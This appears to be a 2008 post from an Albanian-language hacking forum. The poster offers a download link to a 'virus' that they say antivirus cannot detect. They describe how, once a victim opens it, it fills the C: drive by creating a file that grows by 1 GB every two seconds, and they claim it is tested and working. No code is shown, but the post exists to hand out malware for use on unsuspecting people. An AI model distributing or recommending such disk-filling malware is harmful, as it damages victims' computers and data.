ForumForum  GalleryGallery  KėrkoKėrko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share
 

 krdnj` Virus qe behet 1Gb per 2 sec

Shko poshtė 
AutoriMesazh
ReAlKiNg
Xx|♠| BaBuShii |♠|xX
Xx|♠| BaBuShii |♠|xX
ReAlKiNg

Male Numri i postimeve : 150
Emri : Emri :B3$$! Profesioni: Hacking -->>> Location--->> Hacking & Futbolli
Vendodhja : Ana Shmaiit Te Babadimri.!!
Registration date : 16/02/2008

krdnj` Virus qe behet 1Gb per 2 sec Empty
MesazhTitulli: krdnj` Virus qe behet 1Gb per 2 sec   krdnj` Virus qe behet 1Gb per 2 sec Icon_minitimeTue Mar 25, 2008 10:53 pm

Nuk DETEKTOHET nga ANTIVIRUSI.

Kur e hap viktima kete virus atehere krijohet nje file ne diskun C:/ dhe ai file cdo dy SECONDA e shton nga 1Gb. Me besoni, eshte i provuar dhe punon

KUJDES MOS E HAPNI NE KOMPJUTERIN TUAJ SE NUK JAP PERGJEGJESI

Download:

http://www.speedyshare.com/834719212.html

_________________
krdnj` Virus qe behet 1Gb per 2 sec 303e2px

Vs Hala Nuk Ka Dek Veq Kanihere Po Don Pushim Veq Sa Her Qe ka Mu Kthy Ka me Ba Naj Eksplodim.!!
Mbrapsht nė krye Shko poshtė
http://www.vs-team.org
 
krdnj` Virus qe behet 1Gb per 2 sec
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ......::|| Hacking & Security ||::...... :: Hacking-
Kėrce tek: